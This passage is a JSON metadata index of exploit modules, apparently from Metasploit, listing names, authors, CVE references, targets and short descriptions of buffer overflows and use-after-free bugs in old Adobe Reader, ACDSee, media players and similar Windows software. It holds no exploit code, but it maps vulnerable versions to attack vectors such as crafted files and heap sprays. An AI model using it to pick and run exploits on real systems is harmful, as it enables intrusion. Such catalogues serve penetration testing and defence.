EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.", - "references": [ - "CVE-2011-0647", - "OSVDB-70853", - "BID-46235", - "URL-http://www.securityfocus.com/archive/1/516260", - "ZDI-11-061" - ], - "platform": "Windows", - "arch": "x86", - "rport": 6542, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC Replication Manager 5.2.1 / Windows Native Payload" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/replication_manager_exec.rb", - "is_install_path": true, - "ref_name": "windows/emc/replication_manager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/a_pdf_wav_to_mp3": { - "name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/a_pdf_wav_to_mp3", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-17", - "type": "exploit", - "author": [ - "d4rk-h4ck3r", - "Dr_IDE", - "dookie" - ], - "description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. 
When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-67241", - "EDB-14676", - "EDB-14681" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/a_pdf_wav_to_mp3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/abbs_amp_lst": { - "name": "ABBS Audio Media Player .LST Buffer Overflow", - "fullname": "exploit/windows/fileformat/abbs_amp_lst", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-30", - "type": "exploit", - "author": [ - "Julian Ahrens", - "modpr0be " - ], - "description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. 
This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.", - "references": [ - "OSVDB-75096", - "EDB-25204" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/abbs_amp_lst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/acdsee_fotoslate_string": { - "name": "ACDSee FotoSlate PLP File id Parameter Overflow", - "fullname": "exploit/windows/fileformat/acdsee_fotoslate_string", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-12", - "type": "exploit", - "author": [ - "Parvez Anwar", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. 
This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.", - "references": [ - "CVE-2011-2595", - "OSVDB-75425", - "BID-49558" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ACDSee FotoSlate 4.0 Build 146" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/acdsee_fotoslate_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/acdsee_xpm": { - "name": "ACDSee XPM File Section Buffer Overflow", - "fullname": "exploit/windows/fileformat/acdsee_xpm", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-11-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2007-2193", - "OSVDB-35236", - "BID-23620" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ACDSee 9.0 (Build 1008)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/acdsee_xpm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/actfax_import_users_bof": { - "name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow", - "fullname": "exploit/windows/fileformat/actfax_import_users_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-28", - "type": "exploit", - 
"author": [ - "Craig Freyman", - "Brandon Perry", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.", - "references": [ - "OSVDB-85175", - "EDB-20915", - "URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/actfax_import_users_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/activepdf_webgrabber": { - "name": "activePDF WebGrabber ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/activepdf_webgrabber", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-08-26", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. 
This control is not marked safe\n for scripting, so choose your attack vector accordingly.", - "references": [ - "OSVDB-64579", - "URL-http://www.activepdf.com/products/serverproducts/webgrabber/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/activepdf_webgrabber", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_collectemailinfo": { - "name": "Adobe Collab.collectEmailInfo() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_collectemailinfo", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-08", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5659", - "OSVDB-41495" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_collectemailinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_cooltype_sing": { - "name": "Adobe CoolType SING Table 
\"uniqueName\" Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_cooltype_sing", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-09-07", - "type": "exploit", - "author": [ - "Unknown", - "sn0wfl0w", - "jduck " - ], - "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.", - "references": [ - "CVE-2010-2883", - "OSVDB-67849", - "URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html", - "URL-http://www.adobe.com/support/security/advisories/apsa10-02.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_cooltype_sing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flashplayer_button": { - "name": "Adobe Flash Player \"Button\" Remote Code Execution", - "fullname": "exploit/windows/fileformat/adobe_flashplayer_button", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-10-28", - "type": "exploit", - "author": [ - "Unknown", - "Haifei Li", - "jduck " - ], - "description": "This module exploits a vulnerability in the handling of certain SWF movies\n within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n are also vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. 
An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due to a hardcoded syscall number.", - "references": [ - "CVE-2010-3654", - "OSVDB-68932", - "BID-44504", - "URL-http://www.adobe.com/support/security/advisories/apsa10-05.html", - "URL-http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/", - "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flashplayer_button", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flashplayer_newfunction": { - "name": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", - "fullname": "exploit/windows/fileformat/adobe_flashplayer_newfunction", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-04", - "type": "exploit", - "author": [ - "Unknown", - "jduck " - ], - "description": "This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. 
An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.", - "references": [ - "CVE-2010-1297", - "OSVDB-65141", - "BID-40586", - "URL-http://www.adobe.com/support/security/advisories/apsa10-01.html", - "URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flashplayer_newfunction", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_flatedecode_predictor02": { - "name": "Adobe FlateDecode Stream Predictor 02 Integer Overflow", - "fullname": "exploit/windows/fileformat/adobe_flatedecode_predictor02", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-08", - "type": "exploit", - "author": [ - "unknown", - "jduck " - ], - "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n Acrobat Professional versions before 9.2.", - "references": [ - "CVE-2009-3459", - "BID-36600", - "OSVDB-58729", - "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/", - "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows Universal (JS Heap Spray)" - ], - 
"mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_flatedecode_predictor02", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_geticon": { - "name": "Adobe Collab.getIcon() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_geticon", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-03-24", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens ", - "jduck " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2009-0927", - "OSVDB-53647", - "ZDI-09-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Universal (JS Heap Spray)" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_geticon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_illustrator_v14_eps": { - "name": "Adobe Illustrator CS4 v14.0.0", - "fullname": "exploit/windows/fileformat/adobe_illustrator_v14_eps", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-03", - "type": "exploit", - "author": [ - "pyrokinesis", - "dookie" - ], - "description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit", - "references": [ - 
"CVE-2009-4195", - "BID-37192", - "OSVDB-60632", - "EDB-10281" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_illustrator_v14_eps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_jbig2decode": { - "name": "Adobe JBIG2Decode Memory Corruption", - "fullname": "exploit/windows/fileformat/adobe_jbig2decode", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-02-19", - "type": "exploit", - "author": [ - "natron ", - "xort", - "redsand", - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.", - "references": [ - "CVE-2009-0658", - "OSVDB-52073" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v9.0.0 (Windows XP SP3 English)", - "Adobe Reader v8.1.2 (Windows XP SP2 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_jbig2decode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_libtiff": { - "name": "Adobe Acrobat Bundled LibTIFF Integer Overflow", - "fullname": "exploit/windows/fileformat/adobe_libtiff", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-02-16", - "type": "exploit", - "author": [ - "Microsoft", - "villy ", - 
"jduck " - ], - "description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.", - "references": [ - "CVE-2010-0188", - "BID-38195", - "OSVDB-62526", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html", - "URL-http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76", - "URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_libtiff", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_media_newplayer": { - "name": "Adobe Doc.media.newPlayer Use After Free Vulnerability", - "fullname": "exploit/windows/fileformat/adobe_media_newplayer", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-12-14", - "type": "exploit", - "author": [ - "unknown", - "hdm ", - "pusscat ", - "jduck " - ], - "description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.", - "references": [ - "CVE-2009-4324", - "BID-37331", - "OSVDB-60980" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows English (JS Heap Spray)", - "Adobe Reader Windows German (JS Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb", - "is_install_path": true, - "ref_name": 
"windows/fileformat/adobe_media_newplayer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_pdf_embedded_exe": { - "name": "Adobe PDF Embedded EXE Social Engineering", - "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "Colin Ames ", - "jduck " - ], - "description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.", - "references": [ - "CVE-2010-1240", - "OSVDB-63667", - "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", - "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", - "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)" - ], - "mod_time": "2024-08-26 16:47:26 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_pdf_embedded_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": { - "name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", - "fullname": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs", - "aliases": [], - "rank": 600, - 
"disclosure_date": "2010-03-29", - "type": "exploit", - "author": [ - "Jeremy Conway " - ], - "description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.", - "references": [ - "CVE-2010-1240", - "OSVDB-63667", - "URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/", - "URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/", - "URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_reader_u3d": { - "name": "Adobe Reader U3D Memory Corruption Vulnerability", - "fullname": "exploit/windows/fileformat/adobe_reader_u3d", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-12-06", - "type": "exploit", - "author": [ - "Felipe Andres Manzano", - "sinn3r ", - "juan vazquez ", - "jduck " - ], - "description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. 
A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.", - "references": [ - "CVE-2011-2462", - "OSVDB-77529", - "BID-50922", - "URL-http://www.adobe.com/support/security/advisories/apsa11-04.html", - "URL-http://web.archive.org/web/20210228195907/http://blog.9bplus.com/analyzing-cve-2011-2462/", - "URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0", - "URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_reader_u3d", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_toolbutton": { - "name": "Adobe Reader ToolButton Use After Free", - "fullname": "exploit/windows/fileformat/adobe_toolbutton", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-08-08", - "type": "exploit", - "author": [ - "Soroush Dalili", - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. 
This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.", - "references": [ - "CVE-2013-3346", - "OSVDB-96745", - "ZDI-13-212", - "URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP / Adobe Reader 9/10/11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_toolbutton", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_u3d_meshdecl": { - "name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun", - "fullname": "exploit/windows/fileformat/adobe_u3d_meshdecl", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-13", - "type": "exploit", - "author": [ - "Felipe Andres Manzano ", - "jduck " - ], - "description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. 
By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2009-3953", - "OSVDB-61690", - "URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader Windows Universal (JS Heap Spray)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_u3d_meshdecl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/adobe_utilprintf": { - "name": "Adobe util.printf() Buffer Overflow", - "fullname": "exploit/windows/fileformat/adobe_utilprintf", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-08", - "type": "exploit", - "author": [ - "MC ", - "Didier Stevens " - ], - "description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. 
By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-2992", - "OSVDB-49520" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Adobe Reader v8.1.2 (Windows XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/adobe_utilprintf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/allplayer_m3u_bof": { - "name": "ALLPlayer M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/allplayer_m3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-09", - "type": "exploit", - "author": [ - "metacom", - "Mike Czumak", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. 
This module has been tested successfully on\n Windows 7 SP1.", - "references": [ - "CVE-2013-7409", - "BID-62926", - "BID-63896", - "EDB-28855", - "EDB-29549", - "EDB-29798", - "EDB-32041", - "OSVDB-98283", - "URL-http://www.allplayer.org/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - " ALLPlayer 2.8.1 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/allplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/altap_salamander_pdb": { - "name": "Altap Salamander 2.5 PE Viewer Buffer Overflow", - "fullname": "exploit/windows/fileformat/altap_salamander_pdb", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-19", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.", - "references": [ - "CVE-2007-3314", - "BID-24557", - "OSVDB-37579", - "URL-http://vuln.sg/salamander25-en.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal Salamander 2.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/altap_salamander_pdb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
